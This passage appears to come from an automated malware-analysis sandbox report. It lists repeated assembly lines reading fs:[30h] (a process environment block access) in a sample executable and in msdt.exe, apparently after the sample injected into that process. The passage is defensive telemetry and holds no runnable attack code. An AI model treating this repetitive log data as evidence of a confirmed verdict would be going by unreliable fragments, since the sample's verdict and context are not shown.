Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017158EC mov eax, dword ptr fs:[00000030h] 0_2_017158EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov ecx, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov ecx, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017590AF mov eax, dword ptr fs:[00000030h] 0_2_017590AF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719080 mov eax, dword ptr fs:[00000030h] 0_2_01719080
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h] 0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h] 0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h] 0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h] 0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171DB60 mov ecx, dword ptr fs:[00000030h] 0_2_0171DB60
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8B58 mov eax, dword ptr fs:[00000030h] 0_2_017E8B58
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171F358 mov eax, dword ptr fs:[00000030h] 0_2_0171F358
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171DB40 mov eax, dword ptr fs:[00000030h] 0_2_0171DB40
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D131B mov eax, dword ptr fs:[00000030h] 0_2_017D131B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173DBE9 mov eax, dword ptr fs:[00000030h] 0_2_0173DBE9
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h] 0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h] 0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E5BA5 mov eax, dword ptr fs:[00000030h] 0_2_017E5BA5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742397 mov eax, dword ptr fs:[00000030h] 0_2_01742397
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174B390 mov eax, dword ptr fs:[00000030h] 0_2_0174B390
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D138A mov eax, dword ptr fs:[00000030h] 0_2_017D138A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CD380 mov ecx, dword ptr fs:[00000030h] 0_2_017CD380
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h] 0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h] 0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175927A mov eax, dword ptr fs:[00000030h] 0_2_0175927A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h] 0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h] 0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8A62 mov eax, dword ptr fs:[00000030h] 0_2_017E8A62
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DEA55 mov eax, dword ptr fs:[00000030h] 0_2_017DEA55
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017A4257 mov eax, dword ptr fs:[00000030h] 0_2_017A4257
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h] 0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h] 0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov ecx, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h] 0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h] 0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h] 0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h] 0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01733A1C mov eax, dword ptr fs:[00000030h] 0_2_01733A1C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01728A0A mov eax, dword ptr fs:[00000030h] 0_2_01728A0A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742AE4 mov eax, dword ptr fs:[00000030h] 0_2_01742AE4
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742ACB mov eax, dword ptr fs:[00000030h] 0_2_01742ACB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h] 0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h] 0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174FAB0 mov eax, dword ptr fs:[00000030h] 0_2_0174FAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h] 0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h] 0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h] 0_2_0173C577
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h] 0_2_0173C577
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01737D50 mov eax, dword ptr fs:[00000030h] 0_2_01737D50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01753D43 mov eax, dword ptr fs:[00000030h] 0_2_01753D43
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793540 mov eax, dword ptr fs:[00000030h] 0_2_01793540
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AD30 mov eax, dword ptr fs:[00000030h] 0_2_0171AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DE539 mov eax, dword ptr fs:[00000030h] 0_2_017DE539
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8D34 mov eax, dword ptr fs:[00000030h] 0_2_017E8D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0179A537 mov eax, dword ptr fs:[00000030h] 0_2_0179A537
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017C8DF1 mov eax, dword ptr fs:[00000030h] 0_2_017C8DF1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h] 0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h] 0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov ecx, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B090AF mov eax, dword ptr fs:[00000030h] 2_2_04B090AF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9080 mov eax, dword ptr fs:[00000030h] 2_2_04AC9080
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h] 2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h] 2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD849B mov eax, dword ptr fs:[00000030h] 2_2_04AD849B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC58EC mov eax, dword ptr fs:[00000030h] 2_2_04AC58EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B814FB mov eax, dword ptr fs:[00000030h] 2_2_04B814FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98CD6 mov eax, dword ptr fs:[00000030h] 2_2_04B98CD6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFBC2C mov eax, dword ptr fs:[00000030h] 2_2_04AFBC2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h] 2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h] 2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE746D mov eax, dword ptr fs:[00000030h] 2_2_04AE746D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B82073 mov eax, dword ptr fs:[00000030h] 2_2_04B82073
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91074 mov eax, dword ptr fs:[00000030h] 2_2_04B91074
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA44B mov eax, dword ptr fs:[00000030h] 2_2_04AFA44B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h] 2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h] 2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h] 2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h] 2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF35A1 mov eax, dword ptr fs:[00000030h] 2_2_04AF35A1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B469A6 mov eax, dword ptr fs:[00000030h] 2_2_04B469A6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h] 2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h] 2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA185 mov eax, dword ptr fs:[00000030h] 2_2_04AFA185
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC182 mov eax, dword ptr fs:[00000030h] 2_2_04AEC182
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h] 2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h] 2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2990 mov eax, dword ptr fs:[00000030h] 2_2_04AF2990
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B78DF1 mov eax, dword ptr fs:[00000030h] 2_2_04B78DF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
